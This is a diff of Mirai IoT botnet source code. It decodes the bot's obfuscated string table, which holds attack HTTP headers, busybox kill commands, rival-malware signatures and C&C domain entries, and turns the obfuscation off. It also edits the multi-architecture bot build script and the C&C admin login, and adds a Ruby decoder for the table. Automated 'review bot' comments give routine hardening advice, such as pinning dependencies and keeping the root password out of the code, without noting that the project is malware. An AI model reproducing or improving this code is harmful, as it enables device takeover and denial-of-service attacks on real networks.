add_entry(TABLE_SCAN_RESP, "\x4d\x49\x52\x41\x49\x3a\x20\x61\x70\x70\x6c\x65\x74\x20\x6e\x6f\x74\x20\x66\x6f\x75\x6e\x64\x00", 24);
|
||||
add_entry(TABLE_SCAN_NCORRECT, "\x6e\x63\x6f\x72\x72\x65\x63\x74\x00", 9);
|
||||
add_entry(TABLE_SCAN_PS, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x70\x73\x00", 16);
|
||||
add_entry(TABLE_SCAN_KILL_9, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x00", 22);
|
||||
add_entry(TABLE_ATK_VSE, "\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00", 21);
|
||||
add_entry(TABLE_ATK_RESOLVER, "\x2f\x65\x74\x63\x2f\x72\x65\x73\x6f\x6c\x76\x2e\x63\x6f\x6e\x66\x00", 17);
|
||||
add_entry(TABLE_ATK_NSERV, "\x6e\x61\x6d\x65\x73\x65\x72\x76\x65\x72\x20\x00", 12);
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE, "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 23);
|
||||
add_entry(TABLE_ATK_ACCEPT, "\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x00", 83);
|
||||
add_entry(TABLE_ATK_ACCEPT_LNG, "\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38\x00", 32);
|
||||
add_entry(TABLE_ATK_CONTENT_TYPE, "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x00", 48);
|
||||
add_entry(TABLE_ATK_SET_COOKIE, "\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65\x28\x27\x00", 12);
|
||||
add_entry(TABLE_ATK_REFRESH_HDR, "\x72\x65\x66\x72\x65\x73\x68\x3a\x00", 9);
|
||||
add_entry(TABLE_ATK_LOCATION_HDR, "\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x00", 10);
|
||||
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x73\x65\x74\x2d\x63\x6f\x6f\x6b\x69\x65\x3a\x00", 12);
|
||||
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x00", 16);
|
||||
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x74\x72\x61\x6e\x73\x66\x65\x72\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x00", 19);
|
||||
add_entry(TABLE_ATK_CHUNKED, "\x63\x68\x75\x6e\x6b\x65\x64\x00", 8);
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 11);
|
||||
add_entry(TABLE_ATK_CONNECTION_HDR, "\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x00", 12);
|
||||
add_entry(TABLE_ATK_DOSARREST, "\x73\x65\x72\x76\x65\x72\x3a\x20\x64\x6f\x73\x61\x72\x72\x65\x73\x74\x00", 18);
|
||||
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x73\x65\x72\x76\x65\x72\x3a\x20\x63\x6c\x6f\x75\x64\x66\x6c\x61\x72\x65\x2d\x6e\x67\x69\x6e\x78\x00", 25);
|
||||
add_entry(TABLE_HTTP_ONE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
|
||||
add_entry(TABLE_HTTP_TWO, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
|
||||
add_entry(TABLE_HTTP_THREE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
|
||||
add_entry(TABLE_HTTP_FOUR, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
|
||||
add_entry(TABLE_HTTP_FIVE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x30\x5f\x31\x31\x5f\x36\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x36\x30\x31\x2e\x37\x2e\x37\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x56\x65\x72\x73\x69\x6f\x6e\x2f\x39\x2e\x31\x2e\x32\x20\x53\x61\x66\x61\x72\x69\x2f\x36\x30\x31\x2e\x37\x2e\x37\x00", 117);
|
||||
|
||||
add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);
|
||||
|
||||
// safe string https://youtu.be/dQw4w9WgXcQ
|
||||
add_entry(TABLE_KILLER_SAFE, "\x4A\x56\x56\x52\x51\x18\x0D\x0D\x5B\x4D\x57\x56\x57\x0C\x40\x47\x0D\x46\x73\x55\x16\x55\x1B\x75\x45\x7A\x41\x73\x22", 29);
|
||||
add_entry(TABLE_KILLER_PROC, "\x0D\x52\x50\x4D\x41\x0D\x22", 7);
|
||||
add_entry(TABLE_KILLER_EXE, "\x0D\x47\x5A\x47\x22", 5);
|
||||
add_entry(TABLE_KILLER_DELETED, "\x02\x0A\x46\x47\x4E\x47\x56\x47\x46\x0B\x22", 11);
|
||||
add_entry(TABLE_KILLER_FD, "\x0D\x44\x46\x22", 4);
|
||||
add_entry(TABLE_KILLER_ANIME, "\x0C\x43\x4C\x4B\x4F\x47\x22", 7);
|
||||
add_entry(TABLE_KILLER_STATUS, "\x0D\x51\x56\x43\x56\x57\x51\x22", 8);
|
||||
add_entry(TABLE_MEM_QBOT, "\x70\x67\x72\x6D\x70\x76\x02\x07\x51\x18\x07\x51\x22", 13);
|
||||
add_entry(TABLE_MEM_QBOT2, "\x6A\x76\x76\x72\x64\x6E\x6D\x6D\x66\x22", 10);
|
||||
add_entry(TABLE_MEM_QBOT3, "\x6E\x6D\x6E\x6C\x6D\x65\x76\x64\x6D\x22", 10);
|
||||
add_entry(TABLE_MEM_UPX, "\x7E\x5A\x17\x1A\x7E\x5A\x16\x66\x7E\x5A\x16\x67\x7E\x5A\x16\x67\x7E\x5A\x16\x11\x7E\x5A\x17\x12\x7E\x5A\x16\x14\x7E\x5A\x10\x10\x22", 33);
|
||||
add_entry(TABLE_MEM_ZOLLARD, "\x58\x4D\x4E\x4E\x43\x50\x46\x22", 8);
|
||||
add_entry(TABLE_MEM_REMAITEN, "\x65\x67\x76\x6E\x6D\x61\x63\x6E\x6B\x72\x22", 11);
|
||||
|
||||
add_entry(TABLE_SCAN_SHELL, "\x51\x4A\x47\x4E\x4E\x22", 6);
|
||||
add_entry(TABLE_SCAN_ENABLE, "\x47\x4C\x43\x40\x4E\x47\x22", 7);
|
||||
add_entry(TABLE_SCAN_SYSTEM, "\x51\x5B\x51\x56\x47\x4F\x22", 7);
|
||||
add_entry(TABLE_SCAN_SH, "\x51\x4A\x22", 3);
|
||||
add_entry(TABLE_SCAN_QUERY, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x6F\x6B\x70\x63\x6B\x22", 19);
|
||||
add_entry(TABLE_SCAN_RESP, "\x6F\x6B\x70\x63\x6B\x18\x02\x43\x52\x52\x4E\x47\x56\x02\x4C\x4D\x56\x02\x44\x4D\x57\x4C\x46\x22", 24);
|
||||
add_entry(TABLE_SCAN_NCORRECT, "\x4C\x41\x4D\x50\x50\x47\x41\x56\x22", 9);
|
||||
add_entry(TABLE_SCAN_PS, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x52\x51\x22", 16);
|
||||
add_entry(TABLE_SCAN_KILL_9, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x49\x4B\x4E\x4E\x02\x0F\x1B\x02\x22", 22);
|
||||
|
||||
add_entry(TABLE_ATK_VSE, "\x76\x71\x4D\x57\x50\x41\x47\x02\x67\x4C\x45\x4B\x4C\x47\x02\x73\x57\x47\x50\x5B\x22", 21);
|
||||
add_entry(TABLE_ATK_RESOLVER, "\x0D\x47\x56\x41\x0D\x50\x47\x51\x4D\x4E\x54\x0C\x41\x4D\x4C\x44\x22", 17);
|
||||
add_entry(TABLE_ATK_NSERV, "\x4C\x43\x4F\x47\x51\x47\x50\x54\x47\x50\x02\x22", 12);
|
||||
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE, "\x61\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x02\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 23);
|
||||
add_entry(TABLE_ATK_ACCEPT, "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5A\x56\x0D\x4A\x56\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4A\x56\x4F\x4E\x09\x5A\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4F\x4E\x19\x53\x1F\x12\x0C\x1B\x0E\x4B\x4F\x43\x45\x47\x0D\x55\x47\x40\x52\x0E\x08\x0D\x08\x19\x53\x1F\x12\x0C\x1A\x22", 83);
|
||||
add_entry(TABLE_ATK_ACCEPT_LNG, "\x63\x41\x41\x47\x52\x56\x0F\x6E\x43\x4C\x45\x57\x43\x45\x47\x18\x02\x47\x4C\x0F\x77\x71\x0E\x47\x4C\x19\x53\x1F\x12\x0C\x1A\x22", 32);
|
||||
add_entry(TABLE_ATK_CONTENT_TYPE, "\x61\x4D\x4C\x56\x47\x4C\x56\x0F\x76\x5B\x52\x47\x18\x02\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x0F\x55\x55\x55\x0F\x44\x4D\x50\x4F\x0F\x57\x50\x4E\x47\x4C\x41\x4D\x46\x47\x46\x22", 48);
|
||||
add_entry(TABLE_ATK_SET_COOKIE, "\x51\x47\x56\x61\x4D\x4D\x49\x4B\x47\x0A\x05\x22", 12);
|
||||
add_entry(TABLE_ATK_REFRESH_HDR, "\x50\x47\x44\x50\x47\x51\x4A\x18\x22", 9);
|
||||
add_entry(TABLE_ATK_LOCATION_HDR, "\x4E\x4D\x41\x43\x56\x4B\x4D\x4C\x18\x22", 10);
|
||||
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x51\x47\x56\x0F\x41\x4D\x4D\x49\x4B\x47\x18\x22", 12);
|
||||
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x41\x4D\x4C\x56\x47\x4C\x56\x0F\x4E\x47\x4C\x45\x56\x4A\x18\x22", 16);
|
||||
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x56\x50\x43\x4C\x51\x44\x47\x50\x0F\x47\x4C\x41\x4D\x46\x4B\x4C\x45\x18\x22", 19);
|
||||
add_entry(TABLE_ATK_CHUNKED, "\x41\x4A\x57\x4C\x49\x47\x46\x22", 8);
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 11);
|
||||
add_entry(TABLE_ATK_CONNECTION_HDR, "\x41\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x22", 12);
|
||||
add_entry(TABLE_ATK_DOSARREST, "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4D\x51\x43\x50\x50\x47\x51\x56\x22", 18);
|
||||
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4E\x4D\x57\x46\x44\x4E\x43\x50\x47\x0F\x4C\x45\x4B\x4C\x5A\x22", 25);
|
||||
|
||||
add_entry(TABLE_HTTP_ONE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
|
||||
add_entry(TABLE_HTTP_TWO, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
|
||||
add_entry(TABLE_HTTP_THREE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
|
||||
add_entry(TABLE_HTTP_FOUR, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
|
||||
add_entry(TABLE_HTTP_FIVE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x6F\x43\x41\x4B\x4C\x56\x4D\x51\x4A\x19\x02\x6B\x4C\x56\x47\x4E\x02\x6F\x43\x41\x02\x6D\x71\x02\x7A\x02\x13\x12\x7D\x13\x13\x7D\x14\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x14\x12\x13\x0C\x15\x0C\x15\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x74\x47\x50\x51\x4B\x4D\x4C\x0D\x1B\x0C\x13\x0C\x10\x02\x71\x43\x44\x43\x50\x4B\x0D\x14\x12\x13\x0C\x15\x0C\x15\x22", 117);
|
||||
}
|
||||
|
||||
void table_unlock_val(uint8_t id)
|
||||
|
@ -86,8 +86,8 @@ void table_unlock_val(uint8_t id)
|
|||
return;
|
||||
}
|
||||
#endif
|
||||
|
||||
toggle_obf(id);
|
||||
//NO OBFUSCATION NEEDED. FIXED.
|
||||
//toggle_obf(id);
|
||||
}
|
||||
|
||||
void table_lock_val(uint8_t id)
|
||||
|
@ -101,8 +101,8 @@ void table_lock_val(uint8_t id)
|
|||
return;
|
||||
}
|
||||
#endif
|
||||
|
||||
toggle_obf(id);
|
||||
//NO OBFUSCATION
|
||||
//toggle_obf(id);
|
||||
}
|
||||
|
||||
char *table_retrieve_val(int id, int *len)
|
||||
|
|
|
@ -1,4 +1,6 @@
|
|||
#!/bin/bash
|
||||
go get github.com/go-sql-driver/mysql
|
||||
go get github.com/mattn/go-shellwords
|
||||
|
||||
FLAGS=""
|
||||
|
||||
|
@ -29,7 +31,6 @@ elif [ "$1" == "release" ]; then
|
|||
compile_bot mipsel mirai.mpsl "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot armv4l mirai.arm "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot armv5l mirai.arm5n "$FLAGS -DKILLER_REBIND_SSH"
|
||||
compile_bot armv6l mirai.arm7 "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot powerpc mirai.ppc "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot sparc mirai.spc "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
compile_bot m68k mirai.m68k "$FLAGS -DKILLER_REBIND_SSH -static"
|
||||
|
@ -40,7 +41,6 @@ elif [ "$1" == "release" ]; then
|
|||
compile_bot mipsel miraint.mpsl "-static"
|
||||
compile_bot armv4l miraint.arm "-static"
|
||||
compile_bot armv5l miraint.arm5n " "
|
||||
compile_bot armv6l miraint.arm7 "-static"
|
||||
compile_bot powerpc miraint.ppc "-static"
|
||||
compile_bot sparc miraint.spc "-static"
|
||||
compile_bot m68k miraint.m68k "-static"
|
||||
|
@ -51,7 +51,6 @@ elif [ "$1" == "debug" ]; then
|
|||
gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.dbg
|
||||
mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips
|
||||
armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm
|
||||
armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7
|
||||
sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4
|
||||
gcc -std=c99 tools/enc.c -g -o debug/enc
|
||||
gcc -std=c99 tools/nogdb.c -g -o debug/nogdb
|
||||
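Review bot: The two `go get` lines added at the top of the script fetch `github.com/go-sql-driver/mysql` and `github.com/mattn/go-shellwords` at whatever revision upstream serves on the day of the build, with no version pin or checksum, so the compiled result depends on the state of two third-party repositories. Recording both modules in a committed `go.mod`/`go.sum` pair, or at least pinning each call as `go get github.com/go-sql-driver/mysql@<pinned-version>` (placeholder), makes the dependency set reviewable and reproducible. Nothing in the visible first lines stops the script when a fetch fails, so a `set -e` after the shebang would be the matching change; the rest of the script lies outside these hunks.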
|
|
|
@ -35,7 +35,8 @@ func (this *Admin) Handle() {
|
|||
|
||||
// Get username
|
||||
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
|
||||
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m"))
|
||||
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m\r\n"))
|
||||
this.conn.Write([]byte("\033[34;1musername\033[33;3m: \033[0m"))
|
||||
username, err := this.ReadLine(false)
|
||||
if err != nil {
|
||||
return
|
||||
|
@ -43,7 +44,8 @@ func (this *Admin) Handle() {
|
|||
|
||||
// Get password
|
||||
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
|
||||
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m"))
|
||||
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m\r\n"))
|
||||
this.conn.Write([]byte("\033[34;1mpassword\033[33;3m: \033[0m"))
|
||||
password, err := this.ReadLine(true)
|
||||
if err != nil {
|
||||
return
|
||||
|
@ -53,7 +55,8 @@ func (this *Admin) Handle() {
|
|||
this.conn.Write([]byte("\r\n"))
|
||||
spinBuf := []byte{'-', '\\', '|', '/'}
|
||||
for i := 0; i < 15; i++ {
|
||||
this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
|
||||
//this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
|
||||
this.conn.Write(append([]byte("\r\033[37;1mchecking account ... \033[31m"), spinBuf[i % len(spinBuf)]))
|
||||
time.Sleep(time.Duration(300) * time.Millisecond)
|
||||
}
|
||||
|
||||
|
@ -61,7 +64,9 @@ func (this *Admin) Handle() {
|
|||
var userInfo AccountInfo
|
||||
if loggedIn, userInfo = database.TryLogin(username, password); !loggedIn {
|
||||
this.conn.Write([]byte("\r\033[32;1mпроизошла неизвестная ошибка\r\n"))
|
||||
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m"))
|
||||
this.conn.Write([]byte("\r\033[32;1mAn unknown error occurred\r\n"))
|
||||
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m\r\n"))
|
||||
this.conn.Write([]byte("\033[31mPress any key to exit. (any key)\033[0m"))
|
||||
buf := make([]byte, 1)
|
||||
this.conn.Read(buf)
|
||||
return
|
||||
|
|
|
@ -7,7 +7,7 @@ import (
|
|||
"time"
|
||||
)
|
||||
|
||||
const DatabaseAddr string = "127.0.0.1"
|
||||
const DatabaseAddr string = "127.0.0.1:3306"
|
||||
const DatabaseUser string = "root"
|
||||
const DatabasePass string = "password"
|
||||
const DatabaseTable string = "mirai"
|
||||
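Review bot: The changed `DatabaseAddr` line sits next to `DatabaseUser string = "root"` and `DatabasePass string = "password"`, so the database superuser credential is stored in the repository and compiled into every build. These values belong in the environment or an untracked configuration file, and the service should use a dedicated account limited to the one schema instead of `root`. `DatabaseTable` holds `"mirai"`, which the setup file creates with `CREATE DATABASE mirai`, so it names a database, not a table; a comment such as `// DatabaseTable is the MySQL database (schema) name` would remove the ambiguity.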
|
|
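--- a/tools/decode_table.rb
+++ b/tools/decode_table.rb
@@ -0,0 +1,58 @@
+hashtable = {
+TABLE_CNC_DOMAIN: "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
+TABLE_CNC_PORT: "\x22\x35",
+TABLE_SCAN_CB_DOMAIN: "\x50\x47\x52\x4d\x50\x56\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
+TABLE_SCAN_CB_PORT: "\x99\xc7",
+TABLE_EXEC_SUCCESS: "\x4e\x4b\x51\x56\x47\x4c\x4b\x4c\x45\x02\x56\x57\x4c\x12\x22",
+TABLE_KILLER_SAFE: "\x4a\x56\x56\x52\x51\x18\x0d\x0d\x5b\x4d\x57\x56\x57\x0c\x40\x47\x0d\x46\x73\x55\x16\x55\x1b\x75\x45\x7a\x41\x73\x22",
+TABLE_KILLER_PROC: "\x0d\x52\x50\x4d\x41\x0d\x22",
+TABLE_KILLER_EXE: "\x0d\x47\x5a\x47\x22",
+TABLE_KILLER_DELETED: "\x02\x0a\x46\x47\x4e\x47\x56\x47\x46\x0b\x22",
+TABLE_KILLER_FD: "\x0d\x44\x46\x22",
+TABLE_KILLER_ANIME: "\x0c\x43\x4c\x4b\x4f\x47\x22",
+TABLE_KILLER_STATUS: "\x0d\x51\x56\x43\x56\x57\x51\x22",
+TABLE_MEM_QBOT: "\x70\x67\x72\x6d\x70\x76\x02\x07\x51\x18\x07\x51\x22",
+TABLE_MEM_QBOT2: "\x6a\x76\x76\x72\x64\x6e\x6d\x6d\x66\x22",
+TABLE_MEM_QBOT3: "\x6e\x6d\x6e\x6c\x6d\x65\x76\x64\x6d\x22",
+TABLE_MEM_UPX: "\x7e\x5a\x17\x1a\x7e\x5a\x16\x66\x7e\x5a\x16\x67\x7e\x5a\x16\x67\x7e\x5a\x16\x11\x7e\x5a\x17\x12\x7e\x5a\x16\x14\x7e\x5a\x10\x10\x22",
+TABLE_MEM_ZOLLARD: "\x58\x4d\x4e\x4e\x43\x50\x46\x22",
+TABLE_MEM_REMAITEN: "\x65\x67\x76\x6e\x6d\x61\x63\x6e\x6b\x72\x22",
+TABLE_SCAN_SHELL: "\x51\x4a\x47\x4e\x4e\x22",
+TABLE_SCAN_ENABLE: "\x47\x4c\x43\x40\x4e\x47\x22",
+TABLE_SCAN_SYSTEM: "\x51\x5b\x51\x56\x47\x4f\x22",
+TABLE_SCAN_SH: "\x51\x4a\x22",
+TABLE_SCAN_QUERY: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x6f\x6b\x70\x63\x6b\x22",
+TABLE_SCAN_RESP: "\x6f\x6b\x70\x63\x6b\x18\x02\x43\x52\x52\x4e\x47\x56\x02\x4c\x4d\x56\x02\x44\x4d\x57\x4c\x46\x22",
+TABLE_SCAN_NCORRECT: "\x4c\x41\x4d\x50\x50\x47\x41\x56\x22",
+TABLE_SCAN_PS: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x52\x51\x22",
+TABLE_SCAN_KILL_9: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x49\x4b\x4e\x4e\x02\x0f\x1b\x02\x22",
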